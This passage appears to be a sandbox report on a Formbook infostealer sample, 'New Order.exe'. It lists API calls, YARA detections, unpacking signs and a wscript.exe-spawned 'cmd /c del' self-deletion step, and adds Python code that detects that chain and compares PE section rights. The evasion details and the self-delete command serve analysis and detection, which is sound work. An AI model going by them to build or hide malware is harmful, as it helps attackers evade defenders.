          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C2B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29A10 NtQuerySection,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C2A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29560 NtWriteFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C2AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C296D0 NtCreateKey,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29760 NtOpenProcess,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C2A770 NtOpenThread,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C2A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C29730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_004181BC NtCreateFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_0041826B NtReadFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_004182EF NtClose,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_0041839F NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0548AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0548A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0548A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0548B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_054898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0548A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_05489A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_033983A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_03398270 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_033982F0 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_033981C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0339839F NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0339826B NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_033982EF NtClose,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_033981BC NtCreateFile,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: String function: 00BEB150 appears 136 times
          Source: C:\Users\user\Desktop\New Order.exe | Code function: String function: 00419F70 appears 38 times
          Source: C:\Users\user\Desktop\New Order.exe | Code function: String function: 0041A0A0 appears 38 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 0544B150 appears 90 times
          Source: New Order.exe, 00000000.00000003.638250187.00000000099EF000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs New Order.exe
          Source: New Order.exe, 00000002.00000002.690441656.0000000000A30000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs New Order.exe
          Source: New Order.exe, 00000002.00000002.690596917.0000000000CDF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs New Order.exe
          Source: New Order.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.New Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New Order.exe.22a0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New Order.exe.22a0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/3@11/7
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_01
          Source: C:\Users\user\Desktop\New Order.exe | File created: C:\Users\user\AppData\Local\Temp\nssD6D2.tmp
          Source: New Order.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\New Order.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\New Order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: New Order.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\New Order.exeFile read: C:\Users\user\Desktop\New Order.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\New Order.exe 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New Order.exe'
          Source: C:\Users\user\Desktop\New Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscript.pdbGCTL source: New Order.exe, 00000002.00000002.690441656.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.656881329.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New Order.exe, 00000000.00000003.641817824.0000000009770000.00000004.00000001.sdmp, New Order.exe, 00000002.00000002.690473130.0000000000BC0000.00000040.00000001.sdmp, wscript.exe, 00000005.00000002.901871458.0000000005420000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New Order.exe, wscript.exe
          Source: Binary string: wscript.pdb source: New Order.exe, 00000002.00000002.690441656.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.656881329.0000000005A00000.00000002.00000001.sdmp
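The process chain listed above is Formbook's cleanup step: the payload running inside explorer.exe starts C:\Windows\SysWOW64\wscript.exe with no script path at all (the command line is just the image), that wscript.exe carries the same code (its RDTSC interceptor at 0x033885E4 is the routine found at 0x004085E4 in New Order.exe, relocated), and it runs cmd.exe /c del against the original sample. The detection logic below is an added example, not part of the Joe Sandbox report. It runs over constructed process-creation events that mirror the chain above; the pid/ppid values and the field layout are assumptions, not a real Sysmon or EDR schema. It flags a cmd.exe deleting a file whenever its parent is a script host that was launched without a script, and records whether the deleted file is one of the images that executed.

```python
"""Flag the explorer.exe -> wscript.exe -> cmd.exe /c del self-deletion chain.

Added example, not part of the sandbox report. SAMPLE_EVENTS is constructed
to mirror the process tree the report lists; pid/ppid values and the field
layout are assumptions, not a real Sysmon or EDR schema.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# "del" followed by one optionally quoted path as the last thing on the line.
DEL_RE = re.compile(r"\bdel\s+['\"]?(?P<target>[^'\"]+?)['\"]?\s*$", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # command line handed to CreateProcess


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def args_after_image(ev: ProcEvent) -> str:
    """Drop the (possibly quoted) image path from the command line; keep the arguments."""
    rest = ev.cmdline.strip()
    if rest[:1] in ("'", '"'):
        end = rest.find(rest[0], 1)
        if end != -1 and basename(rest[1:end]) == basename(ev.image):
            rest = rest[end + 1:]
    elif rest.lower().startswith(ev.image.lower()):
        rest = rest[len(ev.image):]
    return rest.strip()


def is_bare_script_host(ev: ProcEvent) -> bool:
    """wscript/cscript started with no script path has nothing legitimate to run."""
    return basename(ev.image) in SCRIPT_HOSTS and args_after_image(ev) == ""


def find_self_delete_chains(events) -> list:
    """cmd.exe deleting a file, parented by a bare script host; one dict per hit."""
    by_pid = {e.pid: e for e in events}
    executed = {e.image.lower() for e in events}
    hits = []
    for ev in events:
        if basename(ev.image) != "cmd.exe":
            continue
        m = DEL_RE.search(ev.cmdline)
        parent = by_pid.get(ev.ppid)
        if m is None or parent is None or not is_bare_script_host(parent):
            continue
        grandparent = by_pid.get(parent.ppid)
        target = m.group("target").strip()
        hits.append({
            "cmd_pid": ev.pid,
            "script_host_pid": parent.pid,
            "spawned_by": grandparent.image if grandparent else None,
            "deleted": target,
            # True when the file being removed is one of the images that ran.
            "target_was_executed": target.lower() in executed,
        })
    return hits


# Constructed events mirroring the report's process tree (pids are made up).
SAMPLE_EVENTS = [
    ProcEvent(1, 0, r"C:\Users\user\Desktop\New Order.exe", r"'C:\Users\user\Desktop\New Order.exe'"),
    ProcEvent(2, 1, r"C:\Users\user\Desktop\New Order.exe", r"'C:\Users\user\Desktop\New Order.exe'"),
    ProcEvent(3, 0, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(5, 3, r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\SysWOW64\wscript.exe"),
    ProcEvent(6, 5, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\New Order.exe'"),
    ProcEvent(7, 6, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # Benign control: a script host that was given a script to run.
    ProcEvent(8, 3, r"C:\Windows\System32\wscript.exe", r'"C:\Windows\System32\wscript.exe" "C:\Users\user\logon.vbs"'),
]

if __name__ == "__main__":
    for hit in find_self_delete_chains(SAMPLE_EVENTS):
        print(hit)
```

The bare-script-host test is the load-bearing part: a wscript.exe that is told what to run is normal, one with an empty argument list exists only to be a host body for injected code, and a cmd.exe child deleting the file that started the chain confirms the purpose.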

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\New Order.exe | Unpacked PE file: 2.2.New Order.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 0_2_100029F0 push eax; ret
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00415E63 push esp; iretd
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_2_00C3D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\New Order.exe | Code function: 2_1_00415E63 push esp; iretd
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0549D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0339C33C push 020DC012h; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0339B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_03395E63 push esp; iretd
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0339B40B push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0339B402 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 5_2_0339B46C push eax; ret
          Source: C:\Users\user\Desktop\New Order.exe | File created: C:\Users\user\AppData\Local\Temp\nssD6D3.tmp\System.dll
          Source: C:\Users\user\Desktop\New Order.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
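The unpacking indicator in this section compares the section table of the PE image dumped from process 2 at 0x400000 with the section table of the file on disk. The two rights strings differ, so the code executing at the original image base is not the code the loader mapped from disk, which is exactly the residue process hollowing leaves. The parser below is an added example, not part of the report, showing how that comparison is made: it walks IMAGE_SECTION_HEADER entries, prints a rights string in the same letter convention as the indicator (E, R, W per section; every set flag is printed, so a read/write data section shows RW where the report prints W) and diffs an on-disk image against a dump. Both images in the example are constructed headers with no code; the on-disk one uses the five-section NSIS layout the report shows (.text, .rdata, .data, .ndata, .rsrc), the dump a single writable code section.

```python
"""Compare PE section rights between an on-disk file and a memory dump.

Added example, not part of the sandbox report. Both images built below are
constructed headers (no code) so the comparison runs offline; the on-disk
layout mirrors the five NSIS sections the report lists.
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def flags(characteristics: int) -> str:
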